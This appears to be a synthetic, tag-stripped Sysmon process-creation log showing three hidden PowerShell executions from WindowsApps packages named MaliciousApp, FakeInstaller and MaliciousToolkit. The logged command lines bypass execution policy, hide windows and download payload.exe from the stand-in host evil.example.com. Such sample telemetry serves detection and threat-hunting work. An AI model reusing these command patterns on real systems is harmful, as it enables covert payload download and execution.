154100x8000000000000000123456Microsoft-Windows-Sysmon/OperationalDESKTOP-ABC123.contoso.local-2023-06-22 15:23:45.123{a1b2c3d4-e5f6-7890-1234-567890abcdef}4567C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.19041.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\Scripts\setup.ps1"C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\DESKTOP-ABC123\User{a1b2c3d4-e5f6-7890-1234-abcdef123456}0x123451MediumSHA1=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D7E8F9A0B,MD5=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D,SHA256=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D7E8F9A0B1C2D3E4F5A6B7C8D9E0F1A2B{a1b2c3d4-e5f6-7890-1234-fedcba098765}1234C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\AI_STUBS\AiStubX64Elevated.exe"C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\AI_STUBS\AiStubX64Elevated.exe" -appid MaliciousApp -appdir "C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\"DESKTOP-ABC123\User 154100x8000000000000000123457Microsoft-Windows-Sysmon/OperationalDESKTOP-ABC123.contoso.local-2023-06-22 15:24:12.456{b2c3d4e5-f6a7-8901-2345-67890abcdef1}4568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.19041.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -WindowStyle Hidden -NonInteractive -ExecutionPolicy Bypass -file "C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\Scripts\payload.ps1"C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\DESKTOP-ABC123\User{a1b2c3d4-e5f6-7890-1234-abcdef123456}0x123451MediumSHA1=2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B,MD5=2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D,SHA256=2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3B{b2c3d4e5-f6a7-8901-2345-67890abcdef0}1235C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\AI_STUBS\AiStubX86.exe"C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\AI_STUBS\AiStubX86.exe" -appid FakeInstaller -appdir "C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\"DESKTOP-ABC123\User 154100x8000000000000000123458Microsoft-Windows-Sysmon/OperationalDESKTOP-DEF456.contoso.local-2023-06-22 15:25:23.789{c3d4e5f6-a7b8-9012-3456-7890abcdef12}5678C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.19041.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden C:\Program Files\WindowsApps\MaliciousToolkit_3.0.0.0_x64__nopqrstuvwxyz\Scripts\config.ps1 -action download -file http://evil.example.com/payload.exeC:\Program Files\WindowsApps\MaliciousToolkit_3.0.0.0_x64__nopqrstuvwxyz\DESKTOP-DEF456\Admin{c3d4e5f6-a7b8-9012-3456-7890abcdef12}0x678901MediumSHA1=3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C,MD5=3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E,SHA256=3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3B4C{c3d4e5f6-a7b8-9012-3456-7890abcdef11}2345C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c start /b powershell -WindowStyle Hidden C:\Program Files\WindowsApps\MaliciousToolkit_3.0.0.0_x64__nopqrstuvwxyz\Scripts\config.ps1 -action download -file http://evil.example.com/payload.exeDESKTOP-DEF456\Admin